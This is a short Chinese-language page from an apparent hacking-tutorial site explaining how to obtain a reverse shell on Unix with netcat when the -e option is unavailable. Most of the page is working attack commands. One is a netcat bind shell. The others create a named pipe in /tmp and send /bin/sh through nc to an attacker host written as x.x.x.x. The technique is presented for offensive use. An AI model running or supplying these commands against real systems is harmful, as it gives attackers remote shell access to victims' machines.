Unix系统NC反弹shell的方法

页面导航:首页 > 网络安全 > 黑客教程 > Unix系统NC反弹shell的方法

Unix系统NC反弹shell的方法

来源:互联网 作者:脚本宝典 时间:2015-06-06 18:54 【

Unix系统自带NC,但是为了安全,一般不会编译-e选项,也就无法反弹shell。但是可以变换一下思路,不直接使用NC反弹shell,而是反弹一个拥有shell权限的管道。

NC的原生做法:

nc -l -vv -p 2222 -e /bin/bash
无法使用NC反弹的时候可以这样

先在tmp创建一个普通管道
mknod /tmp/backpipe p
或者
mkfifo /tmp/backpipe p
然后管道一边接入shell,一变用NC反弹到攻击者主机x.x.x.x
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe


PS:攻防的对抗一直在思路的转变之间,将原有思路逆转,可能收获不一样的东西!

Tags: UNIX   NC   反弹shell  

相关文章

    文章评论

    最 近 更 新
    热 点 排 行
    Js与CSS工具
    代码转换工具
    
    <